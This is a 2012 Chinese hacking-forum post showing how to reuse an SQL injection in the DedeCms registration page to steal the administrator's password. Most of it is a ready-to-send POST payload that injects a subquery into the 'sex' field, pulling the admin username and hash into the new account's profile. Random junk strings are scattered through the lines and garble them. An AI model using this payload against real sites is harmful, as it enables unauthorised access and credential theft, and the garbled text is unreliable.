找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2103|回复: 0
打印 上一主题 下一主题

DedeCms SQL注射漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-5 10:03:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
dedecms版本 201211226 I: ]4 n+ y! O' M3 j8 R9 f0 K, I
8 ^# b! u) T1 a2 _/ I, Q/ v7 h; d
需要magic_quotes_gpc=Off
6 Y) |' W" H4 y8 o
0 D6 i% M3 p8 _. ~6 m" I7 {2 h6 W: P应该是没有什么大危害的漏洞.
4 V& v# K- B$ f8 g3 ^5 R7 ^原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.) [7 t# a8 l$ G8 }2 p
3 O) @) a& F& z, T: n
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.$ H3 b9 z7 g& L7 d  a
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
. L( W4 @* g* T( w
  d) d9 K# W; `, t/ Shttp:///de/member/reg_new.php7 e( J  k; N. K+ P( R$ o
! v. m' b$ B4 A
POST
# m' O7 y! s4 a9 b  z( A
& \9 R  O0 c0 b, O6 C2 W4 x- A+ Xdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=2 E% h; T3 K: B! _9 T
  W/ b0 }  l: {* f$ n5 D, m
成功注册后,头像处里面有好玩的信息.
% B% `$ w4 s! A4 K: i( ?4 d" q% d' |. k& T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表